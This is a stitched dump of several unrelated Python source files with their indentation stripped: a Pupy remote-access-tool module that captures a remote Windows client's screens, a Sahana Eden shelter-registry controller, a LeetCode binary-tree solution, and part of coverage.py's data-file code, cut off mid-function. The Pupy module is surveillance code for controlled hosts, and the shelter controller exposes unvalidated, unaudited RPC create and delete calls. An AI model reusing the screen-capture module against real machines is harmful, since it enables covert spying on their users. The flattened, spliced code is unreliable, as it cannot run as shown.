# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause |
flavour/cert | controllers/cr.py | 3 | 13875 | # -*- coding: utf-8 -*-
"""
Shelter Registry - Controllers
"""
# @ToDo Search shelters by type, services, location, available space
# @ToDo Tie in assessments from RAT and requests from RMS.
# @ToDo Associate persons with shelters (via presence loc == shelter loc?)
module = request.controller
resourcename = request.function
if module not in deployment_settings.modules:
raise HTTP(404, body="Module disabled: %s" % module)
# Load Models
s3mgr.load("cr_shelter")
# Options Menu (available in all Functions' Views)
s3_menu(module)
# S3 framework functions
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = deployment_settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# =============================================================================
def shelter_type():
"""
RESTful CRUD controller
List / add shelter types (e.g. NGO-operated, Government evacuation center,
School, Hospital -- see Agasti opt_camp_type.)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
# @ToDo: Shelters per type display is broken -- always returns none.
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# -----------------------------------------------------------------------------
def shelter_service():
"""
RESTful CRUD controller
List / add shelter services (e.g. medical, housing, food, ...)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# =============================================================================
def shelter():
""" RESTful CRUD controller
>>> resource="shelter"
>>> from applications.sahana.modules.s3_test import WSGI_Test
>>> test=WSGI_Test(db)
>>> "200 OK" in test.getPage("/sahana/%s/%s" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("List Shelters")
>>> "200 OK" in test.getPage("/sahana/%s/%s/create" % (module,resource)) #doctest: +SKIP
True
>>> test.assertHeader("Content-Type", "text/html") #doctest: +SKIP
>>> test.assertInBody("Add Shelter") #doctest: +SKIP
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=json" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("[")
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=csv" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/csv")
"""
tablename = "cr_shelter"
table = db[tablename]
# Load Models to add tabs
if deployment_settings.has_module("inv"):
s3mgr.load("inv_inv_item")
elif deployment_settings.has_module("req"):
# (gets loaded by Inv if available)
s3mgr.load("req_req")
# Prepare the Presence table for use by Shelters
s3mgr.load("pr_presence")
field = db.pr_presence.shelter_id
field.requires = IS_NULL_OR(IS_ONE_OF(db, "cr_shelter.id",
"%(name)s",
sort=True))
field.represent = lambda id: \
(id and [db.cr_shelter[id].name] or ["None"])[0]
field.ondelete = "RESTRICT"
if deployment_settings.get_ui_camp():
HELP = T("The Camp this person is checking into.")
else:
HELP = T("The Shelter this person is checking into.")
ADD_SHELTER = response.s3.ADD_SHELTER
SHELTER_LABEL = response.s3.SHELTER_LABEL
field.comment = DIV(A(ADD_SHELTER,
_class="colorbox",
_href=URL(c="cr", f="shelter",
args="create",
vars=dict(format="popup")),
_target="top",
_title=ADD_SHELTER),
DIV( _class="tooltip",
_title="%s|%s" % (SHELTER_LABEL,
HELP)))
field.label = SHELTER_LABEL
field.readable = True
field.writable = True
# Make pr_presence.pe_id visible:
pe_id = db.pr_presence.pe_id
pe_id.readable = True
pe_id.writable = True
# Usually, the pe_id field is an invisible foreign key, therefore it
# has no default representation/requirements => need to add this here:
pe_id.label = T("Person/Group")
pe_id.represent = s3_pentity_represent
pe_id.requires = IS_ONE_OF(db, "pr_pentity.pe_id",
s3_pentity_represent,
filterby="instance_type",
orderby="instance_type",
filter_opts=("pr_person",
"pr_group"))
s3mgr.configure("pr_presence",
# presence not deletable in this view! (need to register a check-out
# for the same person instead):
deletable=False,
list_fields=["id",
"pe_id",
"datetime",
"presence_condition",
"proc_desc"
])
# Access from Shelters
s3mgr.model.add_component("pr_presence",
cr_shelter="shelter_id")
s3mgr.configure(tablename,
# Go to People check-in for this shelter after creation
create_next = URL(c="cr", f="shelter",
args=["[id]", "presence"]))
# Pre-processor
response.s3.prep = cr_shelter_prep
rheader = response.s3.shelter_rheader
output = s3_rest_controller(module, resourcename, rheader=rheader)
return output
# -----------------------------------------------------------------------------
def cr_shelter_prep(r):
"""
Pre-processor for the REST Controller
"""
if r.component and r.component.name == "presence":
r.resource.add_filter(db.pr_presence.closed == False)
if r.interactive:
if r.method != "read":
# Don't want to see in Create forms
# inc list_create (list_fields over-rides)
address_hide(r.table)
if r.component:
if r.component.name == "inv_item" or \
r.component.name == "recv" or \
r.component.name == "send":
# Filter out items which are already in this inventory
response.s3.inv_prep(r)
elif r.component.name == "human_resource":
# Filter out people which are already staff for this warehouse
s3_filter_staff(r)
# Cascade the organisation_id from the hospital to the staff
db.hrm_human_resource.organisation_id.default = r.record.organisation_id
db.hrm_human_resource.organisation_id.writable = False
elif r.component.name == "rat":
# Hide the Implied fields
db.assess_rat.location_id.writable = False
db.assess_rat.location_id.default = r.record.location_id
db.assess_rat.location_id.comment = ""
# Set defaults
if auth.is_logged_in():
query = (db.pr_person.uuid == session.auth.user.person_uuid) & \
(db.hrm_human_resource.person_id == db.pr_person.id)
staff_id = db(query).select(db.hrm_human_resource.id,
limitby=(0, 1)).first()
if staff_id:
db.assess_rat.staff_id.default = staff_id.id
elif r.component.name == "presence":
if deployment_settings.get_ui_camp():
REGISTER_LABEL = T("Register Person into this Camp")
EMPTY_LIST = T("No People currently registered in this camp")
else:
REGISTER_LABEL = T("Register Person into this Shelter")
EMPTY_LIST = T("No People currently registered in this shelter")
# Hide the Implied fields
db.pr_presence.location_id.writable = False
db.pr_presence.location_id.default = r.record.location_id
db.pr_presence.location_id.comment = ""
db.pr_presence.proc_desc.readable = db.pr_presence.proc_desc.writable = False
# AT: Add Person
db.pr_presence.pe_id.comment = \
DIV(s3_person_comment(T("Add Person"), REGISTER_LABEL),
DIV(A(s3.crud_strings.pr_group.label_create_button,
_class="colorbox",
_href=URL(c="pr", f="group", args="create",
vars=dict(format="popup")),
_target="top",
_title=s3.crud_strings.pr_group.label_create_button),
DIV(_class="tooltip",
_title="%s|%s" % (T("Create Group Entry"),
T("Create a group entry in the registry.")))
)
)
db.pr_presence.pe_id.widget = S3AutocompleteWidget("pr", "pentity")
# Set defaults
db.pr_presence.datetime.default = request.utcnow
db.pr_presence.observer.default = s3_logged_in_person()
cr_shelter_presence_opts = {
vita.CHECK_IN: vita.presence_conditions[vita.CHECK_IN],
vita.CHECK_OUT: vita.presence_conditions[vita.CHECK_OUT]}
db.pr_presence.presence_condition.requires = IS_IN_SET(
cr_shelter_presence_opts, zero=None)
db.pr_presence.presence_condition.default = vita.CHECK_IN
# Change the Labels
s3.crud_strings.pr_presence = Storage(
title_create = T("Register Person"),
title_display = T("Registration Details"),
title_list = T("Registered People"),
title_update = T("Edit Registration"),
title_search = T("Search Registations"),
subtitle_create = REGISTER_LABEL,
subtitle_list = T("Current Registrations"),
label_list_button = T("List Registrations"),
label_create_button = T("Register Person"),
msg_record_created = T("Registration added"),
msg_record_modified = T("Registration updated"),
msg_record_deleted = T("Registration entry deleted"),
msg_list_empty = EMPTY_LIST
)
elif r.component.name == "req":
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
response.s3.req_create_form_mods()
return True
# =============================================================================
def incoming():
""" Incoming Shipments """
s3mgr.load("inv_inv_item")
try:
return response.s3.inv_incoming()
except TypeError:
return None
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests """
s3mgr.load("req_req")
try:
return response.s3.req_match()
except TypeError:
return None
# =============================================================================
# This code provides urls of the form:
# http://.../eden/cr/call/<service>/rpc/<method>/<id>
# e.g.:
# http://.../eden/cr/call/jsonrpc/rpc/list/2
# It is not currently in use but left in as an example, and because it may
# be used in future for interoperating with or transferring data from Agasti
# which uses xml-rpc. See:
# http://www.web2py.com/examples/default/tools#services
# http://groups.google.com/group/web2py/browse_thread/thread/53086d5f89ac3ae2
def call():
"Call an XMLRPC, JSONRPC or RSS service"
return service()
@service.jsonrpc
@service.xmlrpc
@service.amfrpc
def rpc(method, id=0):
if method == "list":
return db().select(db.cr_shelter.ALL).as_list()
if method == "read":
return db(db.cr_shelter.id == id).select().as_list()
if method == "delete":
status=db(db.cr_shelter.id == id).delete()
if status:
return "Success - record %d deleted!" % id
else:
return "Failed - no record %d!" % id
else:
return "Method not implemented!"
@service.xmlrpc
def create(name):
# Need to do validation manually!
id = db.cr_shelter.insert(name=name)
return id
@service.xmlrpc
def update(id, name):
# Need to do validation manually!
status = db(db.cr_shelter.id == id).update(name=name)
#@todo: audit!
if status:
return "Success - record %d updated!" % id
else:
return "Failed - no record %d!" % id
| mit |
lmmsoft/LeetCode | LeetCode-Algorithm/1123. Lowest Common Ancestor of Deepest Leaves/1123.py | 1 | 2318 | # Definition for a binary tree node.
from typing import Dict, List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves1(self, root: TreeNode) -> TreeNode:
self.parent: Dict[TreeNode, TreeNode] = {}
self.deep_list: Dict[int, List[TreeNode]] = {}
def dfs(n: TreeNode, deep: int):
if deep in self.deep_list:
self.deep_list[deep].append(n)
else:
self.deep_list[deep] = [n]
if n.left:
self.parent[n.left] = n
dfs(n.left, deep + 1)
if n.right:
self.parent[n.right] = n
dfs(n.right, deep + 1)
dfs(root, 0)
max_deep: int = max(self.deep_list.keys())
leaves: list = self.deep_list[max_deep]
while True:
s = set()
for l in leaves:
s.add(l)
if len(s) == 1:
return list(s)[0]
else:
leaves = [self.parent[leaf] for leaf in leaves]
return None
# rank 11 superluminal
# 类似的思路,使用 BFS 实现
def lcaDeepestLeaves(self, root: TreeNode) -> TreeNode:
"""
:type root: TreeNode
:rtype: TreeNode
"""
parent = {}
queue = set([root])
while True:
next_queue = set()
for node in queue:
for child in (node.left, node.right):
if child:
parent[child] = node
next_queue.add(child)
if not next_queue:
break
queue = next_queue
# 此时的queue就是所有的叶子节点,因为他们的next_queue是空的
while len(queue) > 1:
queue = set(parent[n] for n in queue)
for node in queue:
return node
if __name__ == '__main__':
n1 = TreeNode(1)
n2 = TreeNode(2)
n3 = TreeNode(3)
n4 = TreeNode(4)
n5 = TreeNode(5)
n1.left = n2
n1.right = n3
assert Solution().lcaDeepestLeaves(n1) == n1
n2.left = n4
assert Solution().lcaDeepestLeaves(n1) == n4
n2.right = n5
assert Solution().lcaDeepestLeaves(n1) == n2
| gpl-2.0 |
sdeepanshu02/microblog | flask/Lib/site-packages/coverage/data.py | 40 | 27599 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Coverage data for coverage.py."""
import glob
import itertools
import json
import optparse
import os
import os.path
import random
import re
import socket
from coverage import env
from coverage.backward import iitems, string_class
from coverage.debug import _TEST_NAME_FILE
from coverage.files import PathAliases
from coverage.misc import CoverageException, file_be_gone, isolate_module
os = isolate_module(os)
class CoverageData(object):
"""Manages collected coverage data, including file storage.
This class is the public supported API to the data coverage.py collects
during program execution. It includes information about what code was
executed. It does not include information from the analysis phase, to
determine what lines could have been executed, or what lines were not
executed.
.. note::
The file format is not documented or guaranteed. It will change in
the future, in possibly complicated ways. Do not read coverage.py
data files directly. Use this API to avoid disruption.
There are a number of kinds of data that can be collected:
* **lines**: the line numbers of source lines that were executed.
These are always available.
* **arcs**: pairs of source and destination line numbers for transitions
between source lines. These are only available if branch coverage was
used.
* **file tracer names**: the module names of the file tracer plugins that
handled each file in the data.
* **run information**: information about the program execution. This is
written during "coverage run", and then accumulated during "coverage
combine".
Lines, arcs, and file tracer names are stored for each source file. File
names in this API are case-sensitive, even on platforms with
case-insensitive file systems.
To read a coverage.py data file, use :meth:`read_file`, or
:meth:`read_fileobj` if you have an already-opened file. You can then
access the line, arc, or file tracer data with :meth:`lines`, :meth:`arcs`,
or :meth:`file_tracer`. Run information is available with
:meth:`run_infos`.
The :meth:`has_arcs` method indicates whether arc data is available. You
can get a list of the files in the data with :meth:`measured_files`.
A summary of the line data is available from :meth:`line_counts`. As with
most Python containers, you can determine if there is any data at all by
using this object as a boolean value.
Most data files will be created by coverage.py itself, but you can use
methods here to create data files if you like. The :meth:`add_lines`,
:meth:`add_arcs`, and :meth:`add_file_tracers` methods add data, in ways
that are convenient for coverage.py. The :meth:`add_run_info` method adds
key-value pairs to the run information.
To add a file without any measured data, use :meth:`touch_file`.
You write to a named file with :meth:`write_file`, or to an already opened
file with :meth:`write_fileobj`.
You can clear the data in memory with :meth:`erase`. Two data collections
can be combined by using :meth:`update` on one :class:`CoverageData`,
passing it the other.
"""
# The data file format is JSON, with these keys:
#
# * lines: a dict mapping file names to lists of line numbers
# executed::
#
# { "file1": [17,23,45], "file2": [1,2,3], ... }
#
# * arcs: a dict mapping file names to lists of line number pairs::
#
# { "file1": [[17,23], [17,25], [25,26]], ... }
#
# * file_tracers: a dict mapping file names to plugin names::
#
# { "file1": "django.coverage", ... }
#
# * runs: a list of dicts of information about the coverage.py runs
# contributing to the data::
#
# [ { "brief_sys": "CPython 2.7.10 Darwin" }, ... ]
#
# Only one of `lines` or `arcs` will be present: with branch coverage, data
# is stored as arcs. Without branch coverage, it is stored as lines. The
# line data is easily recovered from the arcs: it is all the first elements
# of the pairs that are greater than zero.
def __init__(self, debug=None):
"""Create a CoverageData.
`debug` is a `DebugControl` object for writing debug messages.
"""
self._debug = debug
# A map from canonical Python source file name to a dictionary in
# which there's an entry for each line number that has been
# executed:
#
# { 'filename1.py': [12, 47, 1001], ... }
#
self._lines = None
# A map from canonical Python source file name to a dictionary with an
# entry for each pair of line numbers forming an arc:
#
# { 'filename1.py': [(12,14), (47,48), ... ], ... }
#
self._arcs = None
# A map from canonical source file name to a plugin module name:
#
# { 'filename1.py': 'django.coverage', ... }
#
self._file_tracers = {}
# A list of dicts of information about the coverage.py runs.
self._runs = []
def __repr__(self):
return "<{klass} lines={lines} arcs={arcs} tracers={tracers} runs={runs}>".format(
klass=self.__class__.__name__,
lines="None" if self._lines is None else "{{{0}}}".format(len(self._lines)),
arcs="None" if self._arcs is None else "{{{0}}}".format(len(self._arcs)),
tracers="{{{0}}}".format(len(self._file_tracers)),
runs="[{0}]".format(len(self._runs)),
)
##
## Reading data
##
def has_arcs(self):
"""Does this data have arcs?
Arc data is only available if branch coverage was used during
collection.
Returns a boolean.
"""
return self._has_arcs()
def lines(self, filename):
"""Get the list of lines executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no lines executed, in which case an empty list is returned.
If the file was executed, returns a list of integers, the line numbers
executed in the file. The list is in no particular order.
"""
if self._arcs is not None:
arcs = self._arcs.get(filename)
if arcs is not None:
all_lines = itertools.chain.from_iterable(arcs)
return list(set(l for l in all_lines if l > 0))
elif self._lines is not None:
return self._lines.get(filename)
return None
def arcs(self, filename):
"""Get the list of arcs executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no arcs executed, in which case an empty list is returned.
If the file was executed, returns a list of 2-tuples of integers. Each
pair is a starting line number and an ending line number for a
transition from one line to another. The list is in no particular
order.
Negative numbers have special meaning. If the starting line number is
-N, it represents an entry to the code object that starts at line N.
If the ending ling number is -N, it's an exit from the code object that
starts at line N.
"""
if self._arcs is not None:
if filename in self._arcs:
return self._arcs[filename]
return None
def file_tracer(self, filename):
"""Get the plugin name of the file tracer for a file.
Returns the name of the plugin that handles this file. If the file was
measured, but didn't use a plugin, then "" is returned. If the file
was not measured, then None is returned.
"""
# Because the vast majority of files involve no plugin, we don't store
# them explicitly in self._file_tracers. Check the measured data
# instead to see if it was a known file with no plugin.
if filename in (self._arcs or self._lines or {}):
return self._file_tracers.get(filename, "")
return None
def run_infos(self):
"""Return the list of dicts of run information.
For data collected during a single run, this will be a one-element
list. If data has been combined, there will be one element for each
original data file.
"""
return self._runs
def measured_files(self):
"""A list of all files that had been measured."""
return list(self._arcs or self._lines or {})
def line_counts(self, fullpath=False):
"""Return a dict summarizing the line coverage data.
Keys are based on the file names, and values are the number of executed
lines. If `fullpath` is true, then the keys are the full pathnames of
the files, otherwise they are the basenames of the files.
Returns a dict mapping file names to counts of lines.
"""
summ = {}
if fullpath:
filename_fn = lambda f: f
else:
filename_fn = os.path.basename
for filename in self.measured_files():
summ[filename_fn(filename)] = len(self.lines(filename))
return summ
def __nonzero__(self):
return bool(self._lines or self._arcs)
__bool__ = __nonzero__
def read_fileobj(self, file_obj):
"""Read the coverage data from the given file object.
Should only be used on an empty CoverageData object.
"""
data = self._read_raw_data(file_obj)
self._lines = self._arcs = None
if 'lines' in data:
self._lines = data['lines']
if 'arcs' in data:
self._arcs = dict(
(fname, [tuple(pair) for pair in arcs])
for fname, arcs in iitems(data['arcs'])
)
self._file_tracers = data.get('file_tracers', {})
self._runs = data.get('runs', [])
self._validate()
def read_file(self, filename):
"""Read the coverage data from `filename` into this object."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Reading data from %r" % (filename,))
try:
with self._open_for_reading(filename) as f:
self.read_fileobj(f)
except Exception as exc:
raise CoverageException(
"Couldn't read data from '%s': %s: %s" % (
filename, exc.__class__.__name__, exc,
)
)
_GO_AWAY = "!coverage.py: This is a private format, don't read it directly!"
@classmethod
def _open_for_reading(cls, filename):
"""Open a file appropriately for reading data."""
return open(filename, "r")
@classmethod
def _read_raw_data(cls, file_obj):
"""Read the raw data from a file object."""
go_away = file_obj.read(len(cls._GO_AWAY))
if go_away != cls._GO_AWAY:
raise CoverageException("Doesn't seem to be a coverage.py data file")
return json.load(file_obj)
@classmethod
def _read_raw_data_file(cls, filename):
"""Read the raw data from a file, for debugging."""
with cls._open_for_reading(filename) as f:
return cls._read_raw_data(f)
##
## Writing data
##
def add_lines(self, line_data):
"""Add measured line data.
`line_data` is a dictionary mapping file names to dictionaries::
{ filename: { lineno: None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding lines: %d files, %d lines total" % (
len(line_data), sum(len(lines) for lines in line_data.values())
))
if self._has_arcs():
raise CoverageException("Can't add lines to existing arc data")
if self._lines is None:
self._lines = {}
for filename, linenos in iitems(line_data):
if filename in self._lines:
new_linenos = set(self._lines[filename])
new_linenos.update(linenos)
linenos = new_linenos
self._lines[filename] = list(linenos)
self._validate()
def add_arcs(self, arc_data):
"""Add measured arc data.
`arc_data` is a dictionary mapping file names to dictionaries::
{ filename: { (l1,l2): None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding arcs: %d files, %d arcs total" % (
len(arc_data), sum(len(arcs) for arcs in arc_data.values())
))
if self._has_lines():
raise CoverageException("Can't add arcs to existing line data")
if self._arcs is None:
self._arcs = {}
for filename, arcs in iitems(arc_data):
if filename in self._arcs:
new_arcs = set(self._arcs[filename])
new_arcs.update(arcs)
arcs = new_arcs
self._arcs[filename] = list(arcs)
self._validate()
def add_file_tracers(self, file_tracers):
"""Add per-file plugin information.
`file_tracers` is { filename: plugin_name, ... }
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding file tracers: %d files" % (len(file_tracers),))
existing_files = self._arcs or self._lines or {}
for filename, plugin_name in iitems(file_tracers):
if filename not in existing_files:
raise CoverageException(
"Can't add file tracer data for unmeasured file '%s'" % (filename,)
)
existing_plugin = self._file_tracers.get(filename)
if existing_plugin is not None and plugin_name != existing_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, existing_plugin, plugin_name,
)
)
self._file_tracers[filename] = plugin_name
self._validate()
def add_run_info(self, **kwargs):
"""Add information about the run.
Keywords are arbitrary, and are stored in the run dictionary. Values
must be JSON serializable. You may use this function more than once,
but repeated keywords overwrite each other.
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding run info: %r" % (kwargs,))
if not self._runs:
self._runs = [{}]
self._runs[0].update(kwargs)
self._validate()
def touch_file(self, filename):
"""Ensure that `filename` appears in the data, empty if needed."""
if self._debug and self._debug.should('dataop'):
self._debug.write("Touching %r" % (filename,))
if not self._has_arcs() and not self._has_lines():
raise CoverageException("Can't touch files in an empty CoverageData")
if self._has_arcs():
where = self._arcs
else:
where = self._lines
where.setdefault(filename, [])
self._validate()
def write_fileobj(self, file_obj):
"""Write the coverage data to `file_obj`."""
# Create the file data.
file_data = {}
if self._has_arcs():
file_data['arcs'] = self._arcs
if self._has_lines():
file_data['lines'] = self._lines
if self._file_tracers:
file_data['file_tracers'] = self._file_tracers
if self._runs:
file_data['runs'] = self._runs
# Write the data to the file.
file_obj.write(self._GO_AWAY)
json.dump(file_data, file_obj)
def write_file(self, filename):
"""Write the coverage data to `filename`."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Writing data to %r" % (filename,))
with open(filename, 'w') as fdata:
self.write_fileobj(fdata)
def erase(self):
"""Erase the data in this object."""
self._lines = None
self._arcs = None
self._file_tracers = {}
self._runs = []
self._validate()
def update(self, other_data, aliases=None):
"""Update this data with data from another `CoverageData`.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
"""
if self._has_lines() and other_data._has_arcs():
raise CoverageException("Can't combine arc data with line data")
if self._has_arcs() and other_data._has_lines():
raise CoverageException("Can't combine line data with arc data")
aliases = aliases or PathAliases()
# _file_tracers: only have a string, so they have to agree.
# Have to do these first, so that our examination of self._arcs and
# self._lines won't be confused by data updated from other_data.
for filename in other_data.measured_files():
other_plugin = other_data.file_tracer(filename)
filename = aliases.map(filename)
this_plugin = self.file_tracer(filename)
if this_plugin is None:
if other_plugin:
self._file_tracers[filename] = other_plugin
elif this_plugin != other_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, this_plugin, other_plugin,
)
)
# _runs: add the new runs to these runs.
self._runs.extend(other_data._runs)
# _lines: merge dicts.
if other_data._has_lines():
if self._lines is None:
self._lines = {}
for filename, file_lines in iitems(other_data._lines):
filename = aliases.map(filename)
if filename in self._lines:
lines = set(self._lines[filename])
lines.update(file_lines)
file_lines = list(lines)
self._lines[filename] = file_lines
# _arcs: merge dicts.
if other_data._has_arcs():
if self._arcs is None:
self._arcs = {}
for filename, file_arcs in iitems(other_data._arcs):
filename = aliases.map(filename)
if filename in self._arcs:
arcs = set(self._arcs[filename])
arcs.update(file_arcs)
file_arcs = list(arcs)
self._arcs[filename] = file_arcs
self._validate()
##
## Miscellaneous
##
def _validate(self):
"""If we are in paranoid mode, validate that everything is right."""
if env.TESTING:
self._validate_invariants()
def _validate_invariants(self):
"""Validate internal invariants."""
# Only one of _lines or _arcs should exist.
assert not(self._has_lines() and self._has_arcs()), (
"Shouldn't have both _lines and _arcs"
)
# _lines should be a dict of lists of ints.
if self._has_lines():
for fname, lines in iitems(self._lines):
assert isinstance(fname, string_class), "Key in _lines shouldn't be %r" % (fname,)
assert all(isinstance(x, int) for x in lines), (
"_lines[%r] shouldn't be %r" % (fname, lines)
)
# _arcs should be a dict of lists of pairs of ints.
if self._has_arcs():
for fname, arcs in iitems(self._arcs):
assert isinstance(fname, string_class), "Key in _arcs shouldn't be %r" % (fname,)
assert all(isinstance(x, int) and isinstance(y, int) for x, y in arcs), (
"_arcs[%r] shouldn't be %r" % (fname, arcs)
)
# _file_tracers should have only non-empty strings as values.
for fname, plugin in iitems(self._file_tracers):
assert isinstance(fname, string_class), (
"Key in _file_tracers shouldn't be %r" % (fname,)
)
assert plugin and isinstance(plugin, string_class), (
"_file_tracers[%r] shoudn't be %r" % (fname, plugin)
)
# _runs should be a list of dicts.
for val in self._runs:
assert isinstance(val, dict)
for key in val:
assert isinstance(key, string_class), "Key in _runs shouldn't be %r" % (key,)
def add_to_hash(self, filename, hasher):
"""Contribute `filename`'s data to the `hasher`.
`hasher` is a `coverage.misc.Hasher` instance to be updated with
the file's data. It should only get the results data, not the run
data.
"""
if self._has_arcs():
hasher.update(sorted(self.arcs(filename) or []))
else:
hasher.update(sorted(self.lines(filename) or []))
hasher.update(self.file_tracer(filename))
##
## Internal
##
def _has_lines(self):
"""Do we have data in self._lines?"""
return self._lines is not None
def _has_arcs(self):
"""Do we have data in self._arcs?"""
return self._arcs is not None
class CoverageDataFiles(object):
"""Manage the use of coverage data files."""
def __init__(self, basename=None, warn=None):
"""Create a CoverageDataFiles to manage data files.
`warn` is the warning function to use.
`basename` is the name of the file to use for storing data.
"""
self.warn = warn
# Construct the file name that will be used for data storage.
self.filename = os.path.abspath(basename or ".coverage")
def erase(self, parallel=False):
"""Erase the data from the file storage.
If `parallel` is true, then also deletes data files created from the
basename by parallel-mode.
"""
file_be_gone(self.filename)
if parallel:
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
pattern = os.path.join(os.path.abspath(data_dir), localdot)
for filename in glob.glob(pattern):
file_be_gone(filename)
def read(self, data):
"""Read the coverage data."""
if os.path.exists(self.filename):
data.read_file(self.filename)
def write(self, data, suffix=None):
"""Write the collected coverage data to a file.
`suffix` is a suffix to append to the base file name. This can be used
for multiple or parallel execution, so that many coverage data files
can exist simultaneously. A dot will be used to join the base name and
the suffix.
"""
filename = self.filename
if suffix is True:
# If data_suffix was a simple true value, then make a suffix with
# plenty of distinguishing information. We do this here in
# `save()` at the last minute so that the pid will be correct even
# if the process forks.
extra = ""
if _TEST_NAME_FILE: # pragma: debugging
with open(_TEST_NAME_FILE) as f:
test_name = f.read()
extra = "." + test_name
suffix = "%s%s.%s.%06d" % (
socket.gethostname(), extra, os.getpid(),
random.randint(0, 999999)
)
if suffix:
filename += "." + suffix
data.write_file(filename)
def combine_parallel_data(self, data, aliases=None, data_paths=None):
"""Combine a number of data files together.
Treat `self.filename` as a file prefix, and combine the data from all
of the data files starting with that prefix plus a dot.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
If `data_paths` is provided, it is a list of directories or files to
combine. Directories are searched for files that start with
`self.filename` plus dot as a prefix, and those files are combined.
If `data_paths` is not provided, then the directory portion of
`self.filename` is used as the directory to search for data files.
Every data file found and combined is then deleted from disk. If a file
cannot be read, a warning will be issued, and the file will not be
deleted.
"""
# Because of the os.path.abspath in the constructor, data_dir will
# never be an empty string.
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
data_paths = data_paths or [data_dir]
files_to_combine = []
for p in data_paths:
if os.path.isfile(p):
files_to_combine.append(os.path.abspath(p))
elif os.path.isdir(p):
pattern = os.path.join(os.path.abspath(p), localdot)
files_to_combine.extend(glob.glob(pattern))
else:
raise CoverageException("Couldn't combine from non-existent path '%s'" % (p,))
for f in files_to_combine:
new_data = CoverageData()
try:
new_data.read_file(f)
except CoverageException as exc:
if self.warn:
# The CoverageException has the file name in it, so just
# use the message as the warning.
